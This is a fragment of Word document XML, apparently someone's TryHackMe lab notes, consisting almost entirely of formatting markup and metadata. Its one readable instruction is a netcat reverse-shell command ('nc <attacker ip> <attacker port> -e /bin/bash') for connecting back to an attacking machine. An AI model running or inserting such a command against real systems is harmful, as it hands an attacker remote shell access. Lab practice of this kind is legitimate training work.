    <w:p w14:paraId="4AE9BEEE" w14:textId="1222EBAA" w:rsidR="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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92929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r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  <w:t>creating a connection from your attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE887BE" w14:textId="033B0370" w:rsidR="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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292929"/>
          <w:spacing w:val="-5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nc &lt;attacker ip&gt; &lt;attacker port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC51A2" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="00DE5B0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92929"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A89193" w14:textId="77777777" w:rsidR="00DE5B09" w:rsidRPr="00DE5B09" w:rsidRDefault="00DE5B09" w:rsidP="001D5E9F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  <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD70A1D" w14:textId="77777777" w:rsidR="001D5E9F" w:rsidRDefault="001D5E9F" w:rsidP="00AB1BEE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FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA09F04" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE" w:rsidP="00AB1BEE">
      <w:p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</w:p>
    <w:p w14:paraId="43EF4947" w14:textId="77777777" w:rsidR="00AB1BEE" w:rsidRPr="00AB1BEE" w:rsidRDefault="00AB1BEE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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75794072" w14:textId="77777777" w:rsidR="00771B23" w:rsidRPr="00771B23" w:rsidRDefault="00771B23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</w:p>
    <w:p w14:paraId="58D7C2A8" w14:textId="77777777" w:rsidR="00417991" w:rsidRPr="00771B23" w:rsidRDefault="00417991" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="0E101A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029AF453" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC49C0A" w14:textId="77777777" w:rsidR="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5EAC67" w14:textId="77777777" w:rsidR="00281825" w:rsidRPr="00281825" w:rsidRDefault="00281825" w:rsidP="00281825">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5163E7F3" w14:textId="77777777" w:rsidR="00DE728C" w:rsidRDefault="00DE728C"/>
    <w:sectPr w:rsidR="00DE7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3593"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC10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7704D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F0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1708A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="683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574689">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1422868428">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="409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D"/>
    <w:rsid w:val="001D5E9F"/>
    <w:rsid w:val="00281825"/>
    <w:rsid w:val="00363128"/>
    <w:rsid w:val="00417991"/>
    <w:rsid w:val="004546DD"/>
    <w:rsid w:val="00554BFD"/>
    <w:rsid w:val="006804C0"/>
    <w:rsid w:val="00771B23"/>
    <w:rsid w:val="00A52BB8"/>
    <w:rsid w:val="00A75745"/>
    <w:rsid w:val="00AA5D17"/>
    <w:rsid w:val="00AB1BEE"/>
    <w:rsid w:val="00DE5B09"/>
    <w:rsid w:val="00D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E22561"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{577CCEC5-6A83-D144-8BD5-DF61CCEB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8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B1B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1BEE"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pw-post-body-paragraph">
    <w:name w:val="pw-post-body-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DE5B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5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5B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jw">
    <w:name w:val="jw"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DE5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1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yhackme.com/room/welcome" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.1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Uslu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Betül Uslu</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-07T22:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-27T12:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>